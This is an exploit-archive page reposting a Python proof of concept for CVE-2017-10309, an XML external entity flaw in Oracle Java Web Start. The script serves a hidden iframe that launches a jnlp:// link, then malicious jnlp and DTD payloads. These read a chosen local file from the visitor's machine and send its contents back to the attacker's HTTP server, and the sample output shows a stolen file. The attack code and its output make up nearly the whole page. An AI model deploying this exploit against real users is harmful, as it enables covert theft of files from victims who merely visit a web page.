首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oracle Java SE - Web Start jnlp XML External Entity Processing Information Discl
来源:vfocus.net 作者:mr_me 发布时间:2017-10-31  
#!/usr/local/bin/python
"""
Oracle Java SE Web Start jnlp XML External Entity Processing Information Disclosure Vulnerability
Affected:   <= v8u131
File:       jre-8u131-windows-i586-iftw.exe
SHA1:       85f0de19845deef89cc5a29edebe5bb33023062d
Download:   http://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html
References: SRC-2017-0028 / CVE-2017-10309
Advisory:   http://srcincite.io/advisories/src-2017-0028/
 
Vulnerability Details:
======================
 
Java SE installs a protocol handler in the registry as "HKEY_CLASSES_ROOT\jnlp\Shell\Open\Command\Default" 'C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe" -securejws "%1"'.
This can allow allow an attacker to launch remote jnlp files with little user interaction. A malicious jnlp file containing a crafted XML XXE attack to be leveraged to disclose files, cause a denial of service or trigger SSRF.
 
Notes:
======
 
- It will take a few seconds to fire.
- Some browsers will give a small, innocent looking popup (not a security alert), but IE/Edge doesn't at all.
 
Example:
========
 
saturn:~ mr_me$ ./poc.py
 
    Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
    mr_me 2017
 
(+) usage: ./poc.py <file>
(+) eg: ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
 
saturn:~ mr_me$ ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
 
    Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
    mr_me 2017
 
(+) select your interface: lo0, gif0, stf0, en0, en1, en2, bridge0, p2p0, awdl0, vmnet1, vmnet8, tap0: vmnet8
(+) starting xxe server...
(+) have someone with Java SE installed visit: http://172.16.175.1:9090/
(!) firing webstart...
(!) downloading jnlp...
(!) downloading si.xml...
(+) stolen: Please%20refer%20to%20http://java.com/licensereadme
^C(+) shutting down the web server
saturn:~ mr_me$
"""
 
import sys
import socket
import fcntl
import struct
from random import choice
from string import lowercase
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
 
try:
    import netifaces as ni
except:
    print "(-) try 'pip install netifaces'"
    sys.exit(1)
 
class xxe(BaseHTTPRequestHandler):
 
    # stfu
    def log_message(self, format, *args):
        return
 
    def do_GET(self):
 
        if "leaked" in self.path:
            print "(+) stolen: %s" % self.path.split("?")[1]
            self.send_response(200)
            self.end_headers()
 
        elif self.path == "/":
            print "(!) firing webstart..."
            self.send_response(200)
            self.end_headers()
            message = """
            <html>
            <body>
            <iframe src="jnlp://%s:9090/%s" style="width:0;height:0;border:0; border:none;"></iframe>
            </body>
            </html>
            """ % (ip, path)
            self.wfile.write(message)
            self.wfile.write('\n')
 
        elif "si.xml" in self.path:
            print "(!) downloading si.xml..."
            self.send_response(200)
            self.end_headers()
            message = """
            <!ENTITY %% data SYSTEM "file:///%s">
            <!ENTITY %% param1 "<!ENTITY &#x25; exfil SYSTEM 'http://%s:9090/leaked?%%data;'>">
            """ % (file, ip)
            self.wfile.write(message)
            self.wfile.write('\n')
 
        elif path in self.path:
            print "(!) downloading jnlp..."
            self.send_response(200)
            self.end_headers()
            message = """
            <?xml version="1.0" ?>
            <!DOCTYPE r [
            <!ELEMENT r ANY >
            <!ENTITY %% sp SYSTEM "http://%s:9090/si.xml">
            %%sp;
            %%param1;
            %%exfil;
            ]>
            """ % ip
            self.wfile.write(message)
            self.wfile.write('\n')
        return
 
def banner():
    return """\n\tOracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability\n\tmr_me 2017\n"""
 
if __name__ == '__main__':
 
    print banner()
 
    if len(sys.argv) != 2:
        print "(+) usage: %s <file>" % sys.argv[0]
        print "(+) eg: %s 'C:/Program Files/Java/jre1.8.0_131/README.txt'" % sys.argv[0]
        sys.exit(1)
 
    file = sys.argv[1]
 
    # randomize incase we change payloads and browser caches
    path  = "".join(choice(lowercase) for i in range(10))
    path += ".jnlp"
 
    # interfaces
    ints = ""
    for i in ni.interfaces(): ints += "%s, " % i
    interface = raw_input("(+) select your interface: %s: " % ints[:-2])
 
    # get the ip from the interface
    try:
        ip = ni.ifaddresses(interface)[2][0]['addr']
    except:
        print "(-) no ip address associated with that interface!"
        sys.exit(1)
    print "jnlp://%s:9090/%s" % (ip, path)
    try:
        server = HTTPServer(('0.0.0.0', 9090), xxe)
        print '(+) starting xxe server...'
        print '(+) have someone with Java SE installed visit: http://%s:9090/' % ip
        server.serve_forever()
 
    except KeyboardInterrupt:
        print '(+) shutting down the web server'
        server.socket.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Tizen Studio 1.3 Smart Develop
·Easy MPEG/AVI/DIVX/WMV/RM to D
·DameWare Remote Controller < 1
·WhatsApp 2.17.52 - Memory Corr
·Watchdog Development Anti-Malw
·Vir.IT eXplorer Anti-Virus - P
·PHPMailer 5.2.21 Local File Di
·Sera 1.2 Local Root / Password
·Windows NTLM Auth Hash Disclos
·Oracle PeopleSoft Enterprise P
·GraphicsMagick - Memory Disclo
·Netgear DGN1000 Setup.cgi Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved